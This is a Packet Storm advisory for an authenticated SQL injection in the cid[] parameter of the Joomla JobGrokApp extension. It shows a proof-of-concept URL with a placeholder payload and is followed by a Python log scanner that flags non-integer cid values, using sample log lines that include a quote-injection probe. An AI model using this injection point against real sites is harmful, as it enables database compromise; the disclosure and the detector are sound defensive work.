Joomla JobGrokApp 3.1-1.2.55 SQL Injection

2016-06-07T00:00:00
ID PACKETSTORM:137339
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2016-06-07T00:00:00

Description

`######################  
# Exploit Title : Joomla com_jobgrokapp - SQL Injection  
# Exploit Author : Persian Hack Team  
# Vendor Homepage : http://extensions.joomla.org/extension/job-grok-app  
# Software Link: http://www.uplooder.net/f/tl/42/ae553152683fc9d97a555210d7028a8c/com-jobgrokapp-V3.1-1.2.55.zip  
# Category: [ Webapps ]  
# Tested on: [ Win ]  
# Version: 3.1-1.2.55  
# Date: 2016/06/07  
######################  
#   
# PoC:  
# Log in as an admin user and edit one application; the cid[] parameter is vulnerable to SQL injection  
# Demo :  
# http://localhost/joomla/administrator/index.php?option=com_jobgrokapp&controller=application&task=edit&cid[]=[SQL]  
# Image: http://www.uplooder.net/img/image/30/de1049a0eb485c78590332d185ee7189/com-jobgrokapp.png  
#  
######################  
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)  
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members  
# Homepage : persian-team.ir  
######################   
`
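
A defender-side check for the parameter named in the PoC, added here as an example (it is not part of the advisory or of the extension's code): it scans web access log lines for com_jobgrokapp administrator requests whose cid[] value is not a plain integer. The combined log format, the sample lines, the function names and the premise that legitimate cid[] values are numeric record ids are assumptions made for illustration; values sent in POST bodies do not appear in access logs and are not covered.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# cid, cid[] and cid[0] all populate the same request array in PHP.
CID_NAME_RE = re.compile(r"cid(\[[0-9]*\])?")
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_cid_values(log_line):
    """Return non-integer cid values of a com_jobgrokapp admin request."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/administrator/index.php"):
        return []
    # parse_qsl percent-decodes names and values, so cid%5B%5D matches too.
    params = parse_qsl(url.query, keep_blank_values=True)
    if ("option", "com_jobgrokapp") not in params:
        return []
    return [value for name, value in params
            if CID_NAME_RE.fullmatch(name) and not INTEGER_RE.fullmatch(value)]


def scan(lines):
    """Return (line_number, flagged_values) for every line worth reviewing."""
    hits = []
    for number, line in enumerate(lines, 1):
        values = suspicious_cid_values(line)
        if values:
            hits.append((number, values))
    return hits


# Constructed sample log lines (not taken from a real server).
BASE = "/joomla/administrator/index.php?option=com_jobgrokapp&controller=application&task=edit"
SAMPLE_LOG = [
    f'192.0.2.10 - - [07/Jun/2016:10:00:01 +0000] "GET {BASE}&cid[]=12 HTTP/1.1" 200 5120',
    f'192.0.2.10 - - [07/Jun/2016:10:00:09 +0000] "GET {BASE}&cid%5B%5D=12%27 HTTP/1.1" 500 812',
    '192.0.2.11 - - [07/Jun/2016:10:01:00 +0000] "GET /joomla/administrator/index.php'
    '?option=com_content&task=edit&cid[]=abc HTTP/1.1" 200 100',
    f'192.0.2.12 - - [07/Jun/2016:10:02:30 +0000] "GET {BASE}&cid[0]=7x HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer cid value(s): {values!r}")
```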